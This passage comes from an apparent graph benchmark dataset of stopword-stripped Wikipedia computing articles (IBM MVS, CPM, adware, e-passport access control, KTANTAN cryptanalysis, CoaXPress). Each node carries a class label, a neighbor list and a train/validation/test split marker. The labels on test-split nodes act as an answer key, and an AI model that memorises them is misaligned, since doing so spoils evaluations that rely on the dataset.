run maximum number partitions increased 52 later modifications mft-ii added sub-tasking fixed number tasks longer fixed although number partitions remain limitation experience indicated advisable install mft systems less 256 kib memory 1960s quite large amount also referred sys=int macro expansions system-dependent multiprogramming variable number tasks mvt sophisticated three available configurations os/360 control program one two available configurations final releases mvt intended largest machines system/360 family introduced 1964 become available 1967 early versions many problems simpler mft continued used many years experience indicated advisable install mvt systems less 512 kib memory mvt treated memory used operating system single pool contiguous regions could allocated required unlimited number simultaneous application systems programs scheme flexible mft principle used memory efficiently liable fragmentation one could find although enough spare memory total run program divided separate chunks none large enough system/360 lacked memory relocation hardware memory compaction could used reduce fragmentation facility called rollout/rollin could swap running job secondary storage make memory available another job rolled-out job would however rolled-in original memory locations became available 1971 time sharing option tso use mvt added part release 20.1 tso became widely used program development provided editor ability submit batch jobs notified completion view results without waiting printed reports debuggers programming languages used system/360 tso os/360 communicated terminals using telecommunications access method tcam tcam name suggests ibm hoped would become standard access method data communications fact tcam os/vs2 used almost entirely tso largely superseded virtual telecommunications access method vtam mid-to-late 1970s also referred sys=vms invocations macros system-dependent model 65 multiprocessing m65mp variant mvt runs 360/65 multisystem mode m65mp traps use set system mask ssm instruction serialize disabled code two cpus part m65mp system behavior interfaces mvt system keyword parameter sys=vms included m65mp well uniprocessor mvt pcp mft mvt provide similar facilities point view application programs features available mft mvt system/370 announced 1970 offered essentially facilities system/360 4 times processor speeds similarly priced system/360 cpus 1972 ibm announced system/370 advanced functions main item future sales system/370 would include virtual memory capability could also retro-fitted existing system/370 cpus hence ibm also committed delivering enhanced operating systems could support use virtual memory ibm provided os/360 sysgen option s/370 support support dat os/vs1 successor mft offers similar facilities several additions e.g. res virtual memory vsam see initially available independent component release icr later integrated os/vs1 base ibm released fairly minor enhancements os/vs1 1983 1984 announced would aix/370 aix/esa dppx ix/370 os/vs1 tss/370 system/370 operating systems modern descendants os/vs2 release 1 mvt plus virtual memory vsam see version eventually renamed os/vs2 svs single virtual storage os/vs2 release 2 also known mvs multiple virtual storage introduced svs intended stepping stone mvt mvs historical interest today 1974 ibm released described os/vs2 release 2 really new operating system upwards-compatible os/vs2 release 1 supervisor new system largely rewritten new dialect bsl pl/s bsl pl/s dialects pl/i extensions designed transcribe assembly language code including privileged instructions needed control computer whole time-sensitive os components os dispatcher ios notably among many others remained coded assembly language enhanced os/vs ifox00 assembler older os/360 ieuasm assembler new version noticeable feature supported multiple virtual address spaces different applications thought using range virtual addresses new system virtual memory facilities mapped different ranges real memory addresses application address space consists 3 areas operating system one instance shared jobs application area unique application shared virtual area used various purposes including inter-job communication ibm promised application areas would always least 8mb approach eliminated risk memory fragmentation present mvt svs improved system internal security new system rapidly became known mvs multiple virtual storages original os/vs2 became known svs single virtual storage ibm accepted terminology labelled mvs successors mvs/ xxx mvs introduced new approach workload management allowing users define performance targets high-priority batch jobs enabled users give systems work without affecting performance highest-priority jobs mvs ibm first mainstream operating system system/370 support ibm called tightly coupled multiprocessing 2 later 12 ibm mainframes 16 amdahl mainframes cpus shared concurrent access memory single copy operating system peripheral devices providing greater processing power degree graceful degradation one cpu failed fortunately became increasingly rare event system time rose hours days years initially mvs supplied job queue manager called jes2 job entry subsystem 2 descended hasp houston automatic spooling priority also supported remote job entry workstations located elsewhere jes2 manage jobs one cpu might tightly coupled multiprocessor system 1976 ibm provided another option jes3 job entry subsystem 3 descendant asp attached support processor allows one cpu manage single job queue feeding work several physically distinct cpus therefore allows one operator console manage work cpus note jes1 job queue manager os/vs1 see ibm hoped virtual storage access method vsam would replace earlier sequential indexed direct access methods provided improved versions vsam formats became basis ibm database management systems ims/vs db2 usually esds actual data storage ksds indexes vsam also provides new implementation catalog facility enables applications access files name without needing know disk drive vsam datasets must defined vsam catalog used non-vsam datasets also listed vsam catalog mvs master catalog must vsam catalog catalogs originally provided os/360 form cvols mvs added separate catalog structure vsam later ibm added third type catalog known icf catalog ibm removed support cvol vsam catalogs 2000 since y2k-compliant hence z/os icf catalogs supported 1974 ibm announced systems network architecture meant reduce cost running large networks terminals mainly using communications lines much efficiently available ibm virtual memory operating systems since mainframe software component vtam available operating systems 1977 ibm announced mvs/system extensions program product i.e cost extra money improved mvs performance descendants mvs still used latest descendants system/360 system/390 zseries renamed os/390 system/390 64-bit version zseries named z/os data taken ibm 360 operating systems release history system/370 market chronology products services",
    "neighbors": [
      6148,
      6675,
      8213,
      10273,
      7217,
      10803,
      7733,
      2616,
      573,
      2625,
      8262,
      9811,
      3669,
      8290,
      5220,
      9829,
      6248,
      7272,
      2168,
      2172,
      2179,
      10883,
      6797,
      7312,
      9361,
      1176,
      9370,
      7836,
      7848,
      8879,
      10415,
      6325,
      9921,
      1219,
      8388,
      6342,
      7881,
      8393,
      10958,
      8911,
      1235,
      3816,
      5363,
      2804,
      9977,
      3323,
      9468,
      2813,
      10508,
      11024,
      11539,
      789,
      5397,
      3359,
      6434,
      2345,
      6442,
      1323,
      7983,
      5936,
      7477,
      8502,
      823,
      10040,
      11075,
      3916,
      7507,
      340,
      11604,
      10072,
      863,
      3938,
      868,
      3429,
      6503,
      4968,
      1386,
      10094,
      5492,
      375,
      11131,
      8063,
      4996,
      11656,
      7053,
      8077,
      9619,
      11673,
      6557,
      1952,
      421,
      9139,
      1464,
      3512,
      5562,
      10176,
      4546,
      964,
      8136,
      5065,
      1501,
      477,
      5603,
      11236,
      4586,
      3062,
      6647
    ],
    "mask": "Validation"
  },
  {
    "node_id": 869,
    "label": 3,
    "text": "Communications_Processor_Module:communications processor module communications processor module cpm component motorola 68000 family quicc motorola/freescale semiconductor powerpc/power isa powerquicc microprocessors designed provide features related imaging communications microprocessor delegate input/output processing example sending receiving data via serial interface communications processor module microprocessor perform functions input/output functions require quick response processor example due precise timing requirements data transmission cpm performing operations main microprocessor free perform tasks cpm features risc microcontroller communication processor separate actual central processing unit ip core risc microcontroller communicates core using dual-ported ram special command configuration event registers well via interrupts motorola 68302 integrated multiprotocol processor featured risc processor controlled either microcode rom downloadable firmware various forms microcode shipped different applications example support signaling system 7 communications centronics parallel interface motorola 68360 quicc first design feature communications processor module offering microcode ss7 isdn applications specifications microcontroller programming interface generally shipped customers possible run 68360 slave mode use cpm part chip example m68360quads-040 board 68040 cpu master coupled 68360 cpm slave cpu 68360 processor disabled cpm used later powerquicc series powerpc- power isa-based processors early designs like mpc860 used virtually cpm previous 68360 quicc processors typical features cpm include",
    "neighbors": [
      6914,
      4868,
      7173,
      3846,
      4743,
      10501,
      7305,
      5642,
      1548,
      1933,
      3472,
      1170,
      7065,
      1563,
      1309,
      4897,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      11447,
      8120,
      9020,
      1725,
      1983,
      10945,
      10180,
      5457,
      8530,
      3540,
      342,
      9302,
      11613,
      6878,
      3168,
      1635,
      10214,
      10985,
      3185,
      4211,
      5235,
      3319,
      8058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 870,
    "label": 3,
    "text": "MC68340:mc68340 mc68340 high-performance 32-bit microprocessor direct memory access dma mc68340 one series components motorola m68300 family members family include mc68302 mc68330 mc68331 mc68332 mc68f333",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 871,
    "label": 5,
    "text": "Daytime_Protocol:daytime protocol daytime protocol service internet protocol suite defined 1983 rfc 867 intended testing measurement purposes computer networks host may connect server supports daytime protocol either transmission control protocol tcp user datagram protocol udp port 13 server returns ascii character string current date time unspecified format unix-like operating systems daytime server usually built inetd xinetd daemon service usually enabled default may enabled adding following lines file /etc/inetd.conf telling inetd reload configuration example output may",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      7695,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      933,
      2085,
      3750,
      3751,
      3752,
      9381,
      10924,
      562,
      2996,
      9909,
      6651,
      10171,
      3133,
      829,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      849,
      6993,
      5843,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      891
    ],
    "mask": "Validation"
  },
  {
    "node_id": 872,
    "label": 9,
    "text": "Bayesian_inference_using_Gibbs_sampling:bayesian inference using gibbs sampling bayesian inference using gibbs sampling bugs software package performing bayesian inference using markov chain monte carlo based gibbs sampling bugs used following software",
    "neighbors": [
      2457,
      9926
    ],
    "mask": "Test"
  },
  {
    "node_id": 873,
    "label": 2,
    "text": "Bob_Fabry:bob fabry bob fabry computer science professor university california berkeley conceived idea obtaining darpa funding radically improved version unix started computer systems research group",
    "neighbors": [
      7552,
      5506,
      1927,
      4745,
      10761,
      2061,
      9743,
      8725,
      5534,
      1316,
      684,
      4908,
      1839,
      1718,
      1080,
      9151,
      9153,
      3651,
      7748,
      10436,
      9927,
      8395,
      850,
      6361,
      9306,
      10202,
      3551,
      607,
      9320,
      9452,
      5492,
      633,
      8316
    ],
    "mask": "None"
  },
  {
    "node_id": 874,
    "label": 0,
    "text": "Computational_lexicology:computational lexicology computational lexicology branch computational linguistics concerned use computers study lexicon narrowly described scholars amsler 1980 use computers study machine-readable dictionaries distinguished computational lexicography properly would use computers construction dictionaries though researchers used computational lexicography synonymous computational lexicology emerged separate discipline within computational linguistics appearance machine-readable dictionaries starting creation machine-readable tapes merriam-webster seventh collegiate dictionary merriam-webster new pocket dictionary 1960s john olney et al system development corporation today computational lexicology best known creation applications wordnet computational processing researchers increased time use computational lexicology applied ubiquitously text analysis 1987 amongst others byrd calzolari chodorow developed computational tools text analysis particular model designed coordinating associations involving senses polysemous words computational lexicology contributed understanding content limitations print dictionaries computational purposes i.e clarified previous work lexicography sufficient needs computational linguistics work computational lexicologists almost every portion print dictionary entry studied ranging many computational linguists disenchanted print dictionaries resource computational linguistics lacked sufficient syntactic semantic information computer programs work computational lexicology quickly led efforts two additional directions first collaborative activities computational linguists lexicographers led understanding role corpora played creating dictionaries computational lexicologists moved build large corpora gather basic data lexicographers used create dictionaries acl/dci data collection initiative ldc linguistic data consortium went path advent markup languages led creation tagged corpora could easily analyzed create computational linguistic systems part-of-speech tagged corpora semantically tagged corpora created order test develop pos taggers word semantic disambiguation technology second direction toward creation lexical knowledge bases lkbs lexical knowledge base deemed dictionary computational linguistic purposes especially computational lexical semantic purposes information print dictionary totally explicated meanings words appropriate links senses many began creating resources wished dictionaries created use computational analysis wordnet considered development newer efforts describing syntactic semantic information framenet work fillmore outside computational linguistics ontology work artificial intelligence seen evolutionary effort build lexical knowledge base ai applications optimizing production maintenance extension computational lexicons one crucial aspects impacting nlp main problem interoperability various lexicons frequently incompatible frequent situation merge two lexicons fragments lexicons secondary problem lexicon usually specifically tailored specific nlp program difficulties used within nlp programs applications respect various data models computational lexicons studied iso/tc37 since 2003 within project lexical markup framework leading iso standard 2008 amsler robert 1980 ph.d. dissertation structure merriam-webster pocket dictionary university texas austin",
    "neighbors": [
      416,
      1890,
      7780,
      2948,
      586,
      11056,
      7839
    ],
    "mask": "Validation"
  },
  {
    "node_id": 875,
    "label": 7,
    "text": "OpenLava:openlava openlava open source workload job scheduling software cluster computers openlava derived early version platform lsf configuration file syntax api cli kept unchanged therefore openlava mostly compatible platform lsf openlava based utopia research project university toronto openlava licensed gnu general public license v2 2007 platform computing part ibm released platform lava 1.0 simplified version platform lsf 4.2 code licensed gnu general public license v2 platform lava additional releases v1.0 discontinued 2011 2011 former platform computing employee david bigagli created openlava 1.0 forking code platform lava june 2011 openlava 1.0 code committed github january 2012 openlava 2.0 released feature enhancements bug fixes november 2013 openlava 2.2 released april 2015 openlava 3.0 released november 2015 openlava 3.1 released february 2016 openlava 3.2 released may 2016 openlava 3.3 released october 2016 openlava 4.0 released commercial support longer available see 2014 number former platform computing employees founded teraproc inc. contributes development provides commercial support openlava commercially supported openlava contains add-on features community based openlava project.. october 2016 ibm filed lawsuit alleging copyright infringement trade secrets misappropriation teraproc complaint accused company founders taking “ confidential proprietary source code ibm spectrum lsf product left used basis competitive product openlava david bigagli teraproc employee started openlava project posted notice github announcing downloads openlava disabled dmca takedown notice sent ibm lawyers bigagli later announced source code openlava 3.0 4.0 would taken source code 2.2 would restored order regain github repository openlava.org website claiming dmca claim fraudulent september 18 2018 us courts found favor ibm issued permanent injunction teraproc agents",
    "neighbors": [
      7983,
      9040,
      11221,
      823,
      3449,
      3323,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 876,
    "label": 3,
    "text": "AMD_RDNA_Architecture:amd rdna architecture radeon dna rdna codename gpu microarchitecture accompanying instruction set developed amd gpus successor gcn microarchitecture/instruction set first product lineup featuring rdna radeon rx 5000 series video card launched july 7 2019 architecture also planned used mobile products upcoming next generation game consoles sony microsoft likely risc simd rather simt microarchitecture going manufactured fabricated tsmc 7 nm finfet graphics chips used navi series amd radeon graphics cards architecture features new processor design although first details released amd computex keynote hints aspects previous graphics core next gcn architecture present feature multi-level cache hierarchy improved rendering pipeline support gddr6 memory completely redesigned non-hybrid architecture planned successor rumor starting architecture one biggest changes rdna width wavefront fundamental group work gcn iterations 64 threads wide meaning 64 threads bundled together single wavefront execution rdna drops native 32 threads wide time amd expanded width simds 16 slots 32 aka simd32 meaning size wavefront matches simd size rdna also introduces working primitive shaders feature present hardware vega architecture difficult get real-world performance boost thus amd never enabled primitive shaders rdna compiler-controlled display controller rdna updated support display stream compression 1.2a allowing output 4k 240 hz hdr 4k 120 hz hdr 8k 60 hz gpuopen hosts pdf-document aiming describe environment organization program state amd “ rdna ” generation devices details instruction set microcode formats native family processors accessible programmers compilers rdna instruction set owned amd also owns x86-64 instruction set rdna instruction set basically gcn instruction set several changes architectural changes affect code scheduled",
    "neighbors": [
      1952,
      9057,
      2850,
      2339,
      3204,
      3586,
      1510,
      10658,
      4332,
      5356,
      398,
      2935,
      9391,
      407,
      344,
      11130,
      11485
    ],
    "mask": "None"
  },
  {
    "node_id": 877,
    "label": 4,
    "text": "Adware:adware adware advertising-supported software software generates revenue developer automatically generating online advertisements user interface software screen presented user installation process software may generate two types revenue one display advertisement another pay-per-click basis user clicks advertisement software may implement advertisements variety ways including static box display banner display full screen video pop-up ad form 2003 microsoft encyclopedia security sources use term adware differently software installs system without knowledge displays advertisements user browses internet i.e. form malware software developers offer software free charge rely revenue advertising recoup expenses generate income also offer version software fee without advertising software functions may designed analyze user location internet sites user visits present advertising pertinent types goods services featured legitimate software advertising functions integrated bundled program adware usually seen developer way recover development costs generate revenue cases developer may provide software user free charge reduced price income derived presenting advertisements user may allow motivate developer continue develop maintain upgrade software product use advertising-supported software business becoming increasingly popular third business executives 2007 survey mckinsey company planning using ad-funded software within following two years advertisement-funded software also one business models open-source software software offered advertising-supported mode paid advertisement-free mode latter usually available online purchase license registration code software unlocks mode purchase download separate version software software authors offer advertising-supported versions software alternative option business organizations seeking avoid paying large sums software licenses funding development software higher fees advertisers examples advertising-supported software include adblock plus acceptable ads windows version internet telephony application skype amazon kindle 3 family e-book readers versions called kindle special offers display advertisements home page sleep mode exchange substantially lower pricing 2012 microsoft advertising division microsoft advertising announced windows 8 major release microsoft windows operating system would provide built-in methods software authors use advertising support business model idea considered since early 2005 support advertising popular business model software service saas web notable examples include email service gmail google apps g suite products social network facebook microsoft also adopted advertising-supported model many social software saas offerings microsoft office live service also available advertising-supported mode view federal trade commission staff appears general agreement software considered spyware downloaded installed computer without user knowledge consent however unresolved issues remain concerning consumers need told software installed computers consent adequate instance distributors often disclose end-user license agreement additional software bundled primary software panelists commenters view disclosure sufficient infer consent installation bundled software term adware frequently used describe form malware malicious software presents unwanted advertisements user computer advertisements produced adware sometimes form pop-up sometimes unclosable window term used way severity implication varies sources rate adware irritant others classify online threat even rate seriously computer viruses trojans precise definition term context also varies adware observes computer user activities without consent reports software author called spyware however adware operates legally adware manufacturers even sued antivirus companies blocking adware programs developed detect quarantine remove advertisement-displaying malware including ad-aware malwarebytes anti-malware spyware doctor spybot – search destroy addition almost commercial antivirus software currently detect adware spyware offer separate detection module new wrinkle adware using stolen certificates disables anti-malware virus protection technical remedies available adware also discovered certain low-cost android devices particularly made small chinese firms running allwinner systems-on-chip even cases adware code embedded deep files stored system boot partitions removal involves extensive complex modifications firmware",
    "neighbors": [
      3072,
      5636,
      10245,
      10756,
      9227,
      7694,
      9233,
      9746,
      1046,
      6679,
      9242,
      2075,
      8735,
      9761,
      9256,
      9771,
      8752,
      2611,
      4661,
      10297,
      3643,
      7228,
      7739,
      3135,
      1088,
      9791,
      4165,
      2630,
      9803,
      10323,
      6744,
      6241,
      106,
      107,
      119,
      10872,
      4732,
      5245,
      6786,
      5764,
      4229,
      2182,
      9351,
      7304,
      9356,
      5261,
      6797,
      10898,
      4245,
      10392,
      1690,
      3739,
      5281,
      2213,
      681,
      10431,
      704,
      8387,
      10957,
      7886,
      1745,
      4309,
      4314,
      735,
      2783,
      6367,
      8932,
      10476,
      6382,
      4344,
      3320,
      4863,
      1279,
      7441,
      8978,
      4883,
      278,
      4374,
      3867,
      6431,
      8998,
      7465,
      11051,
      300,
      5935,
      2864,
      6454,
      3395,
      6981,
      1352,
      4435,
      7515,
      11103,
      3941,
      10598,
      11621,
      7529,
      10092,
      9591,
      10103,
      9594,
      3969,
      7044,
      8584,
      1417,
      2443,
      7564,
      9102,
      10141,
      5536,
      423,
      939,
      4013,
      1970,
      4023,
      7098,
      6588,
      7103,
      2508,
      9168,
      467,
      2005,
      10710,
      3032,
      11225,
      9187,
      494,
      6643,
      2041,
      4605,
      2046
    ],
    "mask": "None"
  },
  {
    "node_id": 878,
    "label": 3,
    "text": "SPARCclassic:sparcclassic sparcstation classic workstation introduced sun microsystems november 1992 based sun4m architecture enclosed lunchbox chassis sparcstation classic incorporates single 50 mhz microsparc processor sparcstation classic three banks two dsimm slots official maximum configuration uses 16mb modules first bank also hold 32mb modules giving maximum 128mb memory sparcstation classic hold one internal 3.5-inch 50-pin single ended fast-narrow scsi drive floppy also supports external scsi devices ide/atapi support sparcstation classic comes on-board amd lance ethernet chipset providing 10baset networking standard 10base2 10base5 via aui transceiver openboot rom able boot network using rarp tftp like sparcstation systems ssc holds system information mac address serial number nvram battery chip dies system able boot following operating systems run sparcstation classic sparcstation classic designed entry-level workstation lower price point sparcstation lx lower-end cg3 framebuffer rather lx accelerated cg6 sparcclassic also features 8-bit audio opposed 16-bit audio lx motherboards two systems otherwise similar use chassis july 1993 sun introduced sparcclassic x stripped-down sparcclassic marketed x terminal shipped local storage either 4 8 mb memory rather running solaris sparcclassic x loaded ran special software network sun offered upgrade kit full workstation included hard drive additional memory",
    "neighbors": [
      9665,
      9955,
      10436,
      10595,
      11440,
      823,
      1788
    ],
    "mask": "Test"
  },
  {
    "node_id": 879,
    "label": 2,
    "text": "Glenda_Schroeder:glenda schroeder glenda schroeder american software engineer noted implementing first command-line user interface shell publishing one earliest research papers describing electronic mail systems working member staff mit computation center 1965 early operating system command-line interfaces implemented part resident monitor programs could easily replaced 1964 mit computation center staff member louis pouzin developed runcom tool executing command scripts allowing argument substitution pouzin coined term shell describe technique using commands like programming language wrote paper describing implement idea multics operating system pouzin returned native france 1965 schroeder developed first multics shell assistance unnamed man general electric schroeder multics shell predecessor unix shell still use today working pat crisman louis pouzin also described early e-mail system called mail allow users compatible time-sharing system ctss mit send notifications others backups files user messages would added local file called mail box would “ private ” mode owner could read delete messages proposed uses proto-email system communication ctss notify users files backed discussion authors ctss commands communication command authors ctss manual editor service made possible leave messages users computer idea allow users send messages computers developed later ray tomlinson 1971",
    "neighbors": [
      8879,
      7983,
      11442,
      6772,
      7325
    ],
    "mask": "None"
  },
  {
    "node_id": 880,
    "label": 4,
    "text": "Extended_Access_Control:extended access control extended access control eac set advanced security features electronic passports protects restricts access sensitive personal data contained rfid chip contrast common personal data like bearer ’ photograph names date birth etc protected basic mechanisms sensitive data like fingerprints iris images must protected preventing unauthorized access skimming chip protected eac allow sensitive data read encrypted channel authorized passport inspection system eac introduced icao optional security feature additional basic access control restricting access sensitive biometric data electronic mrtd general idea given chip must contain chip-individual keys must processing capabilities additional key management required however icao leaves actual solution open implementing states several different proposed implementations mechanism must retain backward-compatibility legacy basic access control bac mandatory eu countries european commission described technology used protect fingerprints member states e-passports deadline member states start issuing fingerprint-enabled e-passports set 28 june 2009 specification selected eu e-passports prepared german federal office information security bsi technical report tr-03110 several countries implement eac eac defined eu two requirements chip terminal authentication chip authentication specification defines handheld device cap reader smart card slot decimal keypad display capable displaying least 12 characters chip authentication ca two functions chip authentication add-on basic access control bac protection skimming eavesdropping terminal authentication ta used determine whether inspection system allowed read sensitive data e-passport mechanism based digital certificates come format card verifiable certificates document verifier certificate granted country verification certificate authority cvca certificates domestic foreign document verifiers certificates typically issued medium amounts time half month 3 months cvca generated country typically valid 6 months 3 years",
    "neighbors": [
      10600,
      1501,
      10685,
      10207
    ],
    "mask": "None"
  },
  {
    "node_id": 881,
    "label": 4,
    "text": "3-subset_meet-in-the-middle_attack:3-subset meet-in-the-middle attack 3-subset meet-in-the-middle hereafter shortened mitm attack variant generic meet-in-the-middle attack used cryptology hash block cipher cryptanalysis 3-subset variant opens possibility apply mitm attacks ciphers trivial divide keybits two independent key-spaces required mitm attack 3-subset variant relaxes restriction key-spaces independent moving intersecting parts keyspaces subset contains keybits common two key-spaces original mitm attack first suggested article diffie hellman 1977 discussed cryptanalytic properties des argued keysize des small reapplying des multiple times different keys could solution key-size however advised using double-des suggested triple-des minimum due mitm attacks double-des susceptible mitm attack des could easily split two subciphers first second des encryption keys independent one another thus allowing basic mitm attack reduces computational complexity formula_1 formula_2 many variations emerged since diffie hellman suggested mitm attacks variations either makes mitm attacks effective allows used situations basic variant 3-subset variant shown bogdanov rechberger 2011 shown use cryptanalysis ciphers lightweight block-cipher family ktantan general mitm attacks attack split two phases key-reducing phase key-verification phase first phase domain key-candidates reduced applying mitm attack second phase found key-candidates tested another plain-/ciphertext pair filter away wrong key key-reducing phase attacked cipher split two subciphers formula_3 formula_4 independent keybits normal mitm attacks instead conform limitation keybits two subciphers independent 3-subset attack allows splitting cipher two subciphers bits allowed used subciphers done splitting key three subsets instead namely carry mitm attack 3 subsets bruteforced individually according procedure key-candidate found key-reducing phase tested another plain-/ciphertext pair done simply seeing encryption plaintext p yields known ciphertext c. usually pairs needed makes 3-subset mitm attack little data complexity following example based attack done rechberger bogdanov ktantan cipher-family naming-conventions used paper also used example attack reduces computational complexity ktantan32 formula_17 formula_18 compared bruteforce attack computational complexity formula_17 2014 still practical break attack thus computationally feasible goes ktantan48 ktantan64 complexities seen end example attack possible due weaknesses exploited ktantan bit-wise key-schedule applicable ktantan32 ktantan48 ktantan64 since variations uses key-schedule applicable related kantan family block-ciphers due variations key-schedule ktantan kantan ktantan lightweight block-cipher meant constrained platforms rfid tags cryptographic primitive aes would either impossible given hardware expensive implement invented canniere dunkelman knezevic 2009 takes block size either 32 48 64 bits encrypts using 80-bit key 254 rounds round utilizes two bits key selected key schedule round key preparation attack weaknesses key schedule ktantan allows 3-subset mitm attack identified since two key-bits used round diffusion key per round small safety lies number rounds due structure key-schedule possible find large number consecutive rounds never utilized certain key-bits precisely authors attack found characteristics key-schedule used staging 3-subset mitm attack able split cipher two blocks independent key-bits parameters attack thus one may notice problem step 1.3 key-reducing phase possible directly compare values formula_11 formula_13 formula_11 calculated end round 111 formula_13 calculated start round 131 mitigated another mitm technique called partial-matching authors found calculating forwards intermediate value formula_11 backwards intermediate value formula_13 round 127 8 bits still unchanged formula_11 formula_13 probability one thus compared part state comparing 8 bits 8 bits round 127 ktantan32 10 bits round 123 47 bits round 131 ktantan48 ktantan64 respectively yields false positives nothing increases complexity attack noticeably ktantan32 requires average 2 pairs find key-candidate due false positives matching part state intermediate values ktantan48 ktantan64 average still requires one plain-/ciphertext pair test find correct key-candidates results taken article rechberger bogdanov best attack ktantan anymore best attack 2011 contributed wei rechberger guo wu wang ling improved upon mitm attack ktantan family arrived computational complexity formula_37 4 chosen plain-/ciphertext pairs using indirect partial-matching splice cut mitm techniques",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Validation"
  },
  {
    "node_id": 882,
    "label": 0,
    "text": "TeLQAS:telqas telqas telecommunication literature question answering system experimental question answering system developed answering english questions telecommunications domain telqas includes three main subsystems online subsystem offline subsystem ontology online subsystem answers questions submitted users real time online process telqas processes question using natural language processing component implements part-of-speech tagging simple syntactic parsing online subsystem also utilizes inference engine order carry necessary inference small elements knowledge offline subsystem automatically indexes documents collected focused web crawler web ontology server along api used knowledge representation main concepts classes ontology created domain experts classes however instantiated automatically offline components",
    "neighbors": [
      113,
      11538,
      7780,
      5399
    ],
    "mask": "Test"
  },
  {
    "node_id": 883,
    "label": 9,
    "text": "Don_Syme:syme syme australian computer scientist principal researcher microsoft research cambridge u.k designer architect f programming language described reporter regarded original new face computer languages since bjarne stroustrup developed c++ early 1980s earlier syme created generics .net common language runtime including initial design generics c programming language along others including andrew kennedy later anders hejlsberg kennedy syme dachuan yu also formalized widely used system holds ph.d. university cambridge member wg2.8 working group functional programming co-author book expert f 3.0 past also worked formal specification interactive proof automated verification proof description languages 2015 honored silver medal royal academy engineering",
    "neighbors": [
      3876,
      1236,
      4791,
      8057,
      8059
    ],
    "mask": "Train"
  },
  {
    "node_id": 884,
    "label": 3,
    "text": "Accra_Declaration:accra declaration accra declaration confirmed support two main healthcare interoperability standards open source community support major open source advocates allowed free unfettered access core healthcare interoperability standards resulted substantial increase usage international healthcare modelling standards development organisation ihmsdo earlier placed intellectual property ip hl7 dicom standards ihe profiles public domain creative commons licence declaration signed may 2015 ihmsdo standards implementation meeting ghana",
    "neighbors": [
      2948,
      11126
    ],
    "mask": "None"
  },
  {
    "node_id": 885,
    "label": 3,
    "text": "The_Battle_For_Midway:battle midway battle midway turn-based strategy video game developed published personal software services first released united kingdom france msx 1984 re-released amstrad cpc commodore 64 zx spectrum 1985 second instalment strategic wargames series game set battle midway pacific ocean theatre world war ii revolves around united states navy attacking large imperial japanese fleet stationed midway atoll retaliation attack pearl harbour game player assumes control american forces must eliminate japanese forces around atoll air naval combat battle midway received largely negative reviews upon release criticised incompatibility black white television sets game accessible limited range colours easy difficulty gameplay also criticised game turn-based strategy focuses naval battles battle midway initiated response japanese attack pearl harbour player commands three american task forces two united states navy forces one united states air force unit stationed midway atoll objective game defeat three attacking imperial japanese naval forces american task force aircraft carrier whereas japanese four player begins game two american search aircraft used locate track attacking japanese forces main attacking japanese force located player must send available air units engage combat air combat takes place real time may take minute travel time launched aircraft carrier aircraft run fuel time crash refuelled carrier game contains elements arcade gameplay automatically enable player comes contact enemy arcade sequences involves player utilising anti-air machine gun order shoot japanese aircraft game ends four japanese aircraft carriers destroyed personal software services founded coventry england gary mays richard cockayne 1981 company known creating games featured historic war battles conflicts theatre europe bismark falklands '82 company partnership french video game developer ere informatique published localised versions products united kingdom 1986 cockayne took decision alter products release 16-bit machines found smaller 8-bit computers zx spectrum lacked processing power larger strategy games decision falsely interpreted pulling spectrum market video game journalist phillipa irving following years successful sales throughout mid 1980s personal software services experienced financial difficulties cockayne admitted retrospective interview took eye ball company acquired mirrorsoft february 1987 later dispossessed company due strains debt upon release battle midway packaged exclusive ring-binder manual detailing nature battle midway later re-released part strategic wargames compilation cassette known conflicts 2 published personal software services game received negative reviews upon release angus ryall crash criticised game incompatibility black white television sets stating despite growing british economy ryall expected developers designed games lowest common denominator gwyn hughes sinclair criticised tactical elements game light stating success player depends dexterity brainpower clare edgely sinclair user praised game historical accuracy however felt late release comparison wargames made battle midway feel ordinary reviewer computer stated game flawed attempt recreate famous battle midway despite admitting contained nice touches reviewer australian commodore review praised game wide range features save load functions however criticised menu designs insufficiently integrated arcade sequences calling poor two reviewers spectrum criticised combat sequences reliance speed pressing keys instead use strategy one reviewer considered game sophisticated however reviewer viewed game slow pace graphics negatively despite criticism ryall praised real time element game accessibility saying battle midway current standards reviewer amstrad action praised game accurate reproduction events different levels speed however criticised easy predictability japanese forces reviewer amtix stated game suffered average graphics poor sound also questioned inclusion arcade sequences reviewer 64 recommended battle midway beginners genre despite stating simple game reviewer commodore horizons called enthralling game",
    "neighbors": [
      2460,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 886,
    "label": 5,
    "text": "CoaXPress:coaxpress coaxpress cxp digital interface standard developed high speed image data transmission machine vision applications name portmanteau 'express express train 'coaxial emphasize coaxpress faster standards e.g camera link gige vision uses 75 ohm coaxial cables physical transmission medium coaxpress mostly used digital imaging applications also suitable high-speed transmission universal digital data 'device generates transmits data e.g industrial digital camera connected one coaxial cables 'host receives data e.g frame grabber board computer coaxpress standard 1.0 supports bit rates 6.25 gbit/s per coaxial cable 'device 'host number cables limited standard recent coaxpress cameras frame grabbers use four coaxial cables providing maximum image data rate 2.4 gb/s older camera link standard carry 850 mb/s low speed uplink operating 20.833 mbit/s available control 'device triggering coaxpress 'host supply 24 v coaxial cable 13 w per cable coaxpress standard requires 'device 'host support genicam standardized generic programming interface camera link built upon pure lvds wit transport layer coaxpress transmits data packets cf network packet using 8b/10b encoding provides crc coaxpress competes camera link hs standard automated imaging association coaxpress developed 6 companies adimec eqcologic active silicon among biggest drivers 2008 goal failure visilink develop successor camera link standard high-speed data-rich vision related communication standard first demonstrated november 2008 vision trade show good reception standard writing consortium industrial companies consisting adimec eqcologic active silicon aval data ned components express formed early 2009 next vision 2009 consortium awarded visionaward efforts cause machine vision applications time jiia adopted 